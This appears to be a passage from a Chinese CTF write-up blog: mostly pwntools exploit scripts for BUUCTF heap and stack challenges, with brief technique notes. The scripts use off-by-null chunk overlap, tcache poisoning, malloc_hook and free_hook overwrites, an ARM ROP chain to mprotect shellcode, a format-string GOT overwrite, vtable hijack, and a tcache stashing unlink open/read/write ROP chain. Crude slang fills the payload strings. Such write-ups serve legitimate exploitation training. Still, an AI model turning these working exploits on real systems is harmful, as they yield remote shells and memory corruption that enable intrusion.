r.sendline(str(index))
r.recvuntil('REMARK: ')
r.sendline('nmsl')
def show(index):
r.recvuntil('Your choice: ')
r.sendline('3')
r.recvuntil('to show: ')
r.sendline(str(index))
r.sendline('nmsl')
add(0x90,'fuck','nmsl')#0
add(0x90,'fuck','nmsl')#1 unsortedbin
add(0x40,'a'*0x90,'nmsl')#2
add(0x90,'fuck','nmsl')#3
add(0x90,'fuck','nmsl')#4
add(0x90,'fuck','nmsl')#5
add(0x90,'fuck','nmsl')#6
add(0x90,'fuck','nmsl')#7
add(0x90,'fuck','nmsl')#8
add(0x90,'fuck','nmsl')#9
free(0)
for i in range(3,9):
free(i)
free(1)
show(2)
r.recvuntil('note content: ')
libc_base = u64(r.recv(6).ljust(8,'\x00'))-96-0x10-libc.sym['__malloc_hook']
one = libc_base+0x4f322
malloc_hook = libc_base+libc.sym['__malloc_hook']
log.success(hex(libc_base))
log.success(hex(malloc_hook))
add(0x40,'wdnmd','nmsl')
add(0x40,'b'*0x90,'nmsl')
add(0x40,'wdnmd','nmsl')
free(0)
free(1)
add(0x40,'wsnd',p64(malloc_hook))
add(0x40,'wsnd',p64(malloc_hook))
add(0x40,'wsnd',p64(one))
r.interactive()
👴记得这题比赛的时候是libc-2.23,buu上是2.27但也能做
开局给一个Mmap,rwx,那👴必往这里头写shellcode
malloc时heap_store地址白给,那👴就能得到基址但是👴只需要heap_store地址
edit有off-by-null,👴可以overlap
0-7 7个0xf8,8放一个0x68,9还是0xf8,10随便放个和topchunk隔开
free0-7,9准备进unsortedbin,edit8 off-by-null改9 prev_size和prev_inuse
free 9,然后取回来,又在0x68的地址申请了一个0x68,然后👴可以uaf,先打heap_store,把heap_store地址写到heap_store
然后👴需要申请到malloc_hook
heap_store可控,可以通过修改一字节控制堆指针,利用unsortedbin把main_arena+96写到一个free的tcache,然后改一字节到malloc_hook,把Mmap写进去
from pwn import *
r = remote('node3.buuoj.cn',25970)
#r = process('./sctf_2019_easy_heap')
elf = ELF('./sctf_2019_easy_heap')
libc = ELF('/libc-2.27.so')
context(log_level = 'debug', arch = 'amd64', os = 'linux')
def add(size):
r.recvuntil('>> ')
r.sendline('1')
r.recvuntil('Size: ')
r.sendline(str(size))
def free(index):
r.recvuntil('>> ')
r.sendline('2')
r.recvuntil('Index: ')
r.sendline(str(index))
def edit(index,content):
r.recvuntil('>> ')
r.sendline('3')
r.recvuntil('Index: ')
r.sendline(str(index))
r.recvuntil('Content: ')
r.sendline(content)
r.recvuntil('Mmap: ')
mmap_addr = int(r.recvuntil('\n',drop=True),16)
log.success(hex(mmap_addr))
add(0xf8)#0
r.recvuntil('Address 0x')
base = int(r.recvuntil('\n',drop=True),16) - 0x202068
log.success(hex(base))
log.success(hex(base+0x202060))
add(0xf8)#1
add(0xf8)#2
add(0xf8)#3
add(0xf8)#4
add(0xf8)#5
add(0xf8)#6
add(0xf8)#7
add(0x68)#8 fuck_chunk
add(0xf8)#9
add(0x20)#10
for i in range(0,7):
free(i)
free(7)
edit(8,p64(0)*12+p64(0x170))
free(9)
for i in range(7):
add(0xf8)
add(0xf8)
add(0x68)#9
free(8)
edit(9,p64(base+0x202060))
add(0x68)
add(0x68)#11
add(0xf8)
add(0xf8)
for i in range(0,8):
free(i)
add(0xf8)
add(0xf8)
add(0xf8)
add(0xf8)
add(0xf8)
add(0xf8)
add(0xf8)
add(0xd0)
payload = p64(0x88)+p64(base+0x2020e0)#0
payload += p64(0x88)+p64(base+0x2020f0)#1
edit(11,payload)
edit(0,p64(0x88)+'\x40')#8
edit(1,p64(0x88)+'\x40')#9
free(8)
add(0x20)
edit(9,'\x30')
add(0x10)#14
add(0x10)#15 malloc_hook
edit(11,p64(0x88)+p64(mmap_addr))#0
edit(0,asm(shellcraft.sh()))
edit(15,p64(mmap_addr))
free(14)
r.interactive()
0x00000000004008cc : ldp x19, x20, [sp, #0x10] ; ldp x21, x22, [sp, #0x20] ; ldp x23, x24, [sp, #0x30] ; ldp x29, x30, [sp], #0x40 ; ret
0x00000000004008ac : ldr x3, [x21, x19, lsl #3] ; mov x2, x22 ; mov x1, x23 ; mov w0, w24 ; add x19, x19, #1 ; blr x3
from pwn import*
elf = ELF('./2018_babyarm')
context.binary = elf
r = remote('node3.buuoj.cn',28107)
#r = process(['qemu-aarch64', '-L', '/usr/aarch64-linux-gnu', './2018_babyarm'])
shellcode_addr = 0x411068
bl_mprotect = 0x4007e0
gadget1 = 0x4008cc
gadget2 = 0x04008ac
shellcode = p64(bl_mprotect)+p64(0)+asm(shellcraft.aarch64.sh())
r.recvuntil('Name:')
r.sendline(shellcode)
sleep(0.1)
payload = 'a'*0x48+p64(gadget1)+p64(0)+p64(gadget2)
payload += p64(0)*2+p64(shellcode_addr)+p64(0x7)+p64(0x1000)+p64(0x411000)
payload += p64(0)+p64(shellcode_addr+0x10)
r.sendline(payload)
r.interactive()
from pwn import *
r = process('./vote')
#r = remote('node3.buuoj.cn', 25145)
libc = ELF('/libc-2.23.so')
elf = ELF('./vote')
def add(size, name):
r.recvuntil('Action: ')
r.sendline('0')
r.recvuntil("Please enter the name's size: ")
r.sendline(str(size))
r.recvuntil('Please enter the name: ')
r.sendline(name)
def show(index):
r.recvuntil('Action: ')
r.sendline('1')
r.recvuntil('Please enter the index: ')
r.sendline(str(index))
def free(index):
r.recvuntil('Action: ')
r.sendline('4')
r.recvuntil('Please enter the index: ')
r.sendline(str(index))
add(0xb0,'fuck')
add(0xb0,'fuck')
free(0)
show(0)
r.recvuntil('time:')
leak = int(r.recvuntil('\n',drop=True))
main_arena = leak - 0x58
libc_base = main_arena - 0x3c4b20
log.success(hex(libc_base))
add(0x50,'fuck')
add(0x10,'fuck')
free(1)
add(0x50, p64(0)*3+p64(0xd1))
add(0x70,'fuck')
free(1)
add(0x50, p64(0)*5+p64(0x71))
free(1)
free(2)
free(4)
add(0x50,p64(0)*3+p64(0x71)+p64(main_arena-0x33))
add(0x50,'fuck')
add(0x50,'fuck')
one = libc_base + 0xf1147
payload = 'a'*0x3 + p64(one)
add(0x50, payload)
r.sendline('0')
r.recvuntil('size:')
r.sendline('1')
r.interactive()
ulimit -f 0,程序不能写出任何内容,urandom得到的passcode为空,这时直接跑otp会File size limit exceeded (core dumped),用python把otp作为子进程跑
ulimit -f 0 && python -c "import os; os.system('./otp 0')"
from pwn import *
r = remote('node3.buuoj.cn',28776)
payload = 'a'*10+p64(0x00400807)
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',28281)
elf = ELF('watevr_2019_voting_machine_2')
payload = 'aa'+fmtstr_payload(8, {elf.got['exit']:0x08420736}, numbwritten=2)
r.recvuntil('Topic: ')
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',28032)
for i in range(14):
print(i)
r.recvuntil('buy/return:')
r.sendline(str(i))
r.recvuntil('$4')
r.sendline('$4')
while True:
r.recvuntil('balance: ')
balance = int(r.recvuntil('\n',drop=True))
log.info(balance)
if balance == 3:
r.sendline('14')
r.recvuntil('$4')
r.sendline('$4')
r.interactive()
r.recvuntil('buy/return:')
r.sendline('0')
r.recvuntil('?')
r.sendline('yes')
r.sendline('0')
r.recvuntil('$4')
r.sendline('$4')
from pwn import *
r = remote('node3.buuoj.cn',28170)
libc = ELF('/libc-2.27.so')
elf = ELF('./2018_code')
r.sendline('wyBTs')
r.recvuntil('to save')
payload = 'a'*0x78+p64(0x400983)+p64(elf.got['puts'])+p64(0x400570)+p64(0x400801)
r.sendline(payload)
r.recvuntil('Success\n')
leak = u64(r.recv(6).ljust(8,'\x00'))
libc_base = leak-libc.sym['puts']
payload='a'*0x78+p64(libc_base+0x4f322)
r.sendline(payload)
r.interactive()
off by null overlapping
one_gadget不好使,打free_hook改system
from pwn import *
r = remote('node3.buuoj.cn',28123)
#r = process('./X-nuca_2018_offbyone2')
elf = ELF('./X-nuca_2018_offbyone2')
libc = ELF('/libc-2.27.so')
def add(size,note):
r.sendlineafter('>> ','1')
r.sendlineafter('length: ',str(size))
r.sendlineafter('note:',note)
def free(index):
r.sendlineafter('>> ','2')
r.sendlineafter('index: ',str(index))
def show(index):
r.sendlineafter('>> ','3')
r.sendlineafter('index: ',str(index))
for i in range(7):
add(0xf0,'fuck')
add(0xf0,'fuck')
add(0x88,'nmsl')
add(0xf0,'fuck')
add(0xa0,'wdnmd')
for i in range(7):
free(i)
free(7)
free(8)
add(0x88,'a'*0x80+p64(0x190))
free(9)
for i in range(7):
add(0xf0,'fuck')
add(0xf0,'wdnmd')
show(0)
libc_base=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3ebca0
log.success(hex(libc_base))
system = libc_base+libc.sym['system']
free_hook=libc_base+libc.sym['__free_hook']
log.success(hex(free_hook))
add(0x88,'fuck')
free(9)
free(0)
add(0x88,p64(free_hook))
add(0x88,'/bin/sh\x00')
add(0x88,p64(system))
free(9)
r.interactive()
堆溢出改虚表地址
from pwn import *
r = remote('node3.buuoj.cn',27536)
#r = process('./zoo')
elf = ELF('./zoo')
libc = ELF('/libc-2.23.so')
context(os='linux', arch='amd64')
def add_dog(name,weight):
r.sendlineafter('Your choice :','1')
r.sendlineafter('Name : ',name)
r.sendlineafter('Weight : ',str(weight))
def add_cat(name,weight):
r.sendlineafter('Your choice :','2')
r.sendlineafter('Name : ',name)
r.sendlineafter('Weight : ',str(weight))
def listen(index):
r.sendlineafter('Your choice :','3')
r.sendlineafter('index of animal : ',str(index))
def show(index):
r.sendlineafter('Your choice :','4')
r.sendlineafter('index of animal : ',str(index))
def remove(index):
r.sendlineafter('Your choice :','5')
r.sendlineafter('index of animal : ',str(index))
name = 0x605420
r.recvuntil('Name of Your zoo :')
shellcode = asm(shellcraft.sh())
r.sendline(shellcode+p64(name))
add_dog('fuck',0)
add_dog('fuck',1)
remove(0)
add_dog('a'*0x48+p64(name+len(shellcode)),2)
listen(0)
r.interactive()
glibc2.29-tcache stashing unlink
from pwn import *
r = remote('node3.buuoj.cn',25679)
#r = process('./RedPacket_SoEasyPwn1')
libc = ELF('./libc-2.29.so')
#context.log_level = 'debug'
def add(index,size,content):
r.sendlineafter('input:','1')
r.sendlineafter('idx:',str(index))
r.sendlineafter('):',str(size))
r.sendafter('content:',content)
#(1.0x10 2.0xf0 3.0x300 4.0x400)
def free(index):
r.sendlineafter('input:','2')
r.sendlineafter(':',str(index))
def edit(index,content):
r.sendlineafter('input:','3')
r.sendlineafter('idx:',str(index))
r.sendafter('content:',content)
def show(index):
r.sendlineafter('input:','4')
r.sendlineafter('idx:',str(index))
def gift(fuck):
r.sendlineafter('input:','666')
r.sendline(fuck)
for i in range(6):
add(0,2,'fuck')
free(0)
show(0)
r.recvuntil(' ')
leak = u64(r.recvuntil('\n',drop=True).ljust(8,'\x00'))
heap_base = leak-0x1670
log.success(hex(heap_base))
for i in range(7):
add(i,4,'wdnmd')
for i in range(7):
free(i)
add(0,4,'wdnmd')
add(1,4,'wdnmd')
free(0)
show(0)
r.recvuntil(' ')
leak = u64(r.recvuntil('\n',drop=True).ljust(8,'\x00'))
libc_base = leak-0x1e4ca0
log.success(hex(libc_base))
add(2,3,'wdnmd')
add(4,4,'wdnmd')
add(5,4,'wdnmd')
free(4)
add(6,3,'wdnmd')
add(7,4,'wdnmd')
p_rdi = libc_base + 0x26542
p_rsi = libc_base + 0x26f9e
p_rdx = libc_base + 0x12bda6
p_rax = libc_base + 0x47cf8
syscall = libc_base + 0xcf6c5
leave_ret = libc_base + 0x0000000000058373
#open
payload = p64(0)
payload += p64(p_rdi)+p64(heap_base+0x37f0)
payload += p64(p_rsi)+p64(0)
payload += p64(p_rdx)+p64(0)
payload += p64(p_rax)+p64(2)
payload += p64(syscall)
#payload += p64(libc.sym['open'])
#read
payload += p64(p_rdi)+p64(3)
payload += p64(p_rsi)+p64(heap_base+0x37f0)
payload += p64(p_rdx)+p64(0x70)
payload += p64(p_rax)+p64(0)
payload += p64(syscall)
#payload += p64(libc.sym['read'])
#write
payload += p64(p_rdi)+p64(1)
payload += p64(p_rsi)+p64(heap_base+0x37f0)
payload += p64(p_rdx)+p64(0x70)
payload += p64(p_rax)+p64(1)
payload += p64(syscall)
payload = payload.ljust(0x300,'\x00')
edit(4,payload+p64(0)+p64(0x101)+p64(heap_base+0x37e0)+p64(heap_base+0xa50))
add(8,2,'./flag.txt'+'\x00'*6)
payload = 'a'*0x80+p64(heap_base+0x3d00)+p64(leave_ret)
r.sendline('666')
sleep(0.1)
r.sendline(payload)
log.success(hex(heap_base+0x3d00))
r.interactive()
本作品采用知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议(CC BY-NC-ND 4.0)进行许可。
This work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License (CC BY-NC-ND 4.0).